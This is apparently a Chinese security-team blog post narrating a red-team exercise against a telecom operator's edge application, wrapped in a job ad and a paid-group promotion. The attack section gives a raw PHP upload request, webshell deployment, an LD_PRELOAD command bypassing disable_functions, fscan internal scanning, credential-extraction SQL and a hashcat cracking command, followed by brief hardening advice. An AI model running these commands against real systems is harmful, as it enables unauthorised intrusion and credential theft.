攻防实战绕过disable_function命令执行
攻防实战绕过disable_function命令执行
原创 ashui Rot5pider安全团队 2025-04-25 02:59
蓝
队
蓝队短期HVV攻防演练项目招聘(北京)
工作内容:
负责前期渗透测试及HVV(攻防演练)期间的安全研判、不需要应急。
项目周期:
2个月(含前期渗透准备阶段及HVV实战阶段),五一后启动,具体入场时间面试通过后通知。
工作地点:
北京
薪资待遇:
税前月薪 1.5万-2.2万,面议合格后会发薪资价格; 薪资年底结算。入场可提前垫付10%-20%
任职要求:
熟悉渗透测试流程,具备Web渗透经验; 有HVV项目经验者优先; **责任心强,能适应高强度任务,具备团队协作能力。
投递方式:
** 请将简历发送至[email protected],邮件标题注明【姓名+号码】,通过面试后会联系通知。
注:年底包结款,能扛得住的兄弟来。
一、目标资产发现
1.1 资产定位
源于某运营商的攻防,仅用于记录与学习交流,大佬轻喷 在庞大的资产中找到一个边缘的小程序,经简单测试后,发现在头像上传处使用的白名单校验,本以为整个小程序都是使用同一上传接口。结果发现另外一个上传点和头像上传处的接口不一致,且可以上传php后缀
– 在运营商大型资产池中发现孤立小程序节点
-
初始误判:通过头像上传功能推测统一上传接口
-
突破点:发现独立上传接口/upload.php
先echo个hello world能否解析,成功了
上传个一句话木马,响应包空白(忘记截图了) 多次尝试后,使用免杀php马成功上传
当尝试命令执行时,发现命令都是这个回显,这说明受到disable_function的限制
可以使用蚁剑的插件进行绕过,笔者这里使用哥斯拉 可直接绕过限制命令执行
后续就是上线vshell、简单看了下,没什么防护,毕竟是边缘资产 挂代理,直接fscan扫,可惜这个内网比较小 后续就拿了一些ftp、数据库和web管理员的权限
从数据库中翻到web页面的管理员用户密码
1.2 技术验证
POST /upload.php HTTP/1.1
Host: edge.xxxx.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: application/octet-stream
<?php echo "Hello World"; ?>
------WebKitFormBoundary--
- 响应包验证:
HTTP/1.1 200 OK
Content-Length: 12
Hello World!
二、漏洞利用链
2.1 文件上传突破
|
|
|
|
|---|---|---|
|
|
|
|
|
|
|
|
2.2 Webshell部署
-
使用哥斯拉免杀马(AES加密+动态混淆)
-
上传路径:/data/avatar/2025/02/01/tmp_167890.php
-
特征隐藏:通过preg_replace
动态生成木马主体
三、权限提升
3.1 环境限制
- 禁用函数检测:
disable_functions=system,passthru,exec,shell_exec,popen,proc_open,pcntl_exec
3.2 绕过技术
-
使用哥斯拉LD_PRELOAD
绕过插件 -
执行链路:
LD_PRELOAD=/tmp/libhide.so /usr/bin/php-cgi -f /path/to/malicious_script.php
四、横向移动
4.1 内网探测
- 使用Fscan快速扫描:
fscan -h 192.168.1.0/24 -p 22,3306,6379 --threads 50
- 发现低防护FTP/MySQL服务
4.2 凭证获取
- 从数据库备份文件恢复管理员凭证:
SELECT user, password_hash FROM admin_credentials LIMIT 1;
- 使用hashcat破解:
hashcat -m 3200 hash.txt rockyou.txt --force
五、防御突破总结
5.1 关键突破点
-
多接口资产图谱缺失导致防御盲区
-
.htaccess动态配置管理缺陷
-
禁用函数绕过机制不完善
5.2 安全加固建议
graph TD
A[资产管理] --> B{资产发现}
B --> C[流量+主动扫描]
B --> D[暗网监控]
C --> E[端口协议分析]
D --> F[情报关联]
-
建议部署:
-
文件完整性监控(Wazuh)
-
动态沙箱分析(Cuckoo Sandbox)
-
RASP运行时防护
【限时
6
折!华普安全研究星球:以
原创实战
为主+SRC/内网渗透核心资源库,助你在漏洞挖掘、SRC挖掘少走90%弯路】当90%的网络安全学习者还在重复刷题、泡论坛找零散资料时,华普安全研究星球已构建起完整的「攻防实战知识生态」:
✅ 原创深度技术文档(独家SRC漏洞报告/代码审计报告)
✅ 实战中使用到的工具分享
✅ 全年更新SRC挖掘、代码审计报告(含最新0day验证思路)
✅ 漏洞挖掘思维导图
✅内部知识库、入圈子免费进入
【
实战为王
】不同于传统课程的纸上谈兵!!
内容每日更新
后期我们将持续发布原创代码审计、src等漏洞挖掘文章,后期有些源码、挖掘思路等也会放进圈子哈~
有任何问题可后台留言
往期精选
围观
丨更多
热文
丨更多
·end·
—如果喜欢,快分享给你的朋友们吧—
我们一起愉快的玩耍吧
【免责声明】
“Rot5pider安全团队”作为专注于信息安全技术研究的自媒体平台,致力于传播网络安全领域的前沿知识与防御技术。本平台所载文章、工具及案例均用于合法合规的技术研讨与安全防护演练,严禁任何形式的非法入侵、数据窃取等危害网络安全的行为。所有技术文档仅代表作者研究过程中的技术观察,不构成实际操作建议,更不作为任何法律行为的背书。